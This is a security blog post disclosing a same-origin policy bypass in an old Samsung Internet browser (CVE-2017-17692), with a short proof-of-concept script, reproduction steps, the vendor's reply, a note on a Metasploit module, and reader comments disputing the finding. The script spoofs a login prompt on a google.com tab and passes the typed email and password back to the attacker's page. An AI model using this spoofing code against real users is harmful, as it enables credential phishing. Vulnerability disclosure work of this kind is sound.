Pageviews

Samsung Internet Browser SOP Bypass - CVE-2017-17692

Hi Internet,

Product : Samsung S7 Edge
Product Affected : Samsung Internet browser 5.4.02.3 stable version.

I am using the above product and the updated version for the browser however below are the following steps where SOP bypass can take place.

Snip Code: (Spoof.html)
<script>
function go(){
var x=window.open('https://www.google.com/csi');
setTimeout(function(){x.document.body.innerHTML='<h1>Please login</h1>';a=x.prompt('E-mail','');b=x.prompt('Password','');alert('E-mail: '+a+'\nPassword: '+b)},3000);
}
</script>
<button onclick="go()">go</button>


Steps :
1. Open spoof.html
2. Press Go
3. The page redirects to http://google.com/csi
4. Which give a fake pop up to user by saying enter UserName and Password (Address Bar Spoofing)
5. Once submitted the username and password is shared back to the parent tab which is sign of SOP bypass.

Samsung replied:
Dear Dhiraj,

We would like to thank you for sharing a potential security issue for Samsung mobile device.
We looked into the issue and found that the issue was already patched.

The patch is already preloaded in our upcoming model Galaxy Note8, and the application will be updated via Apps store update in October.

Thank you very much in advance for your cooperation.

Very Respectfully,
Samsung Mobile Security

Development of Metasploit Module:
As the above exploit code impacts most of the OLD Android Stock Browsers, I taught of developing an MSF module for the same, and informed MITRE to assign CVE. Where i got CVE-2017-17692 assigned to this issue from MITRE.

Here is the,
Source Code for Bypassing Same Origin Policy in Samsung Internet Browser in Metasploit

I would like to thank Tod Beardsley and Jeffrey Martin from Rapid7 team for making this possible.

Happy #HaXmas! Tod Beardsley kicks off our twelve-day series with a story of how we worked with me to develop and land an SOP bypass module this fall. The true meaning of Metasploit:
https://blog.rapid7.com/2017/12/25/haxmas-the-true-meaning-s-of-metasploit/ 



Regards
Dhiraj

8 comments:

  1. Hi Dhiraj,

    Thanks for the write up. I am not able to understand where exactly is the vulnerability is; if the attacker is able to get the details of google.com (as per your poc); then yes it is an attack. however, it is a fake popup asking for email and password, just that it is on the next tab. tab browsing is accordance to the SOP only.

    ReplyDelete
    Replies
    1. Indeed, the tab gives a fake pop-up created by attacker on origin of www.google.com once done its passes the credential from www.google.com to attacker's origin and passing such sensitive information from one origin to different one concluded me to be SOP Bypass, hope i was able to explain :)

      Delete
    2. unfortunately I am unable to understand with your explanation as well. In your post you have mentioned the pop up u created via address bar spoofing, and the pop up is a fake popup, the origin of the pop up is your code on your localhost and not google.com, as the request for google.com itself is not going from the browser tab. this could be a case of phishing, but how come the SOP bypass?? Sorry for being silly but i am really not able to connect to it.

      Delete
    3. In this case when HTML code is executed it opens a parent tab (Attacker Tab) which initially has 'Go' button for now and have address bar http://192.168.1.101/dodo which is a different origin.

      Once clicked on the parent tab, a child tab open's up with address bar google.com/csi which is of a different origin and gives a fake pop up to provide login credentials once given, the data is passed back to the parent tab.

      Passing data from child tab to parent tab and having different origin concludes this to be SOP Bypass in Samsung Internet Browser

      Delete
  2. New samsung s9 models will have big storage https://know-samsungs9.blogspot.com.eg/2018/05/new-samsung-s9-models-will-have-big.html

    ReplyDelete
  3. Thanks for sharing such good information. It is really nice and informative.
    Keep it up!!!
    Get best tool for Browser hijacker removal.

    ReplyDelete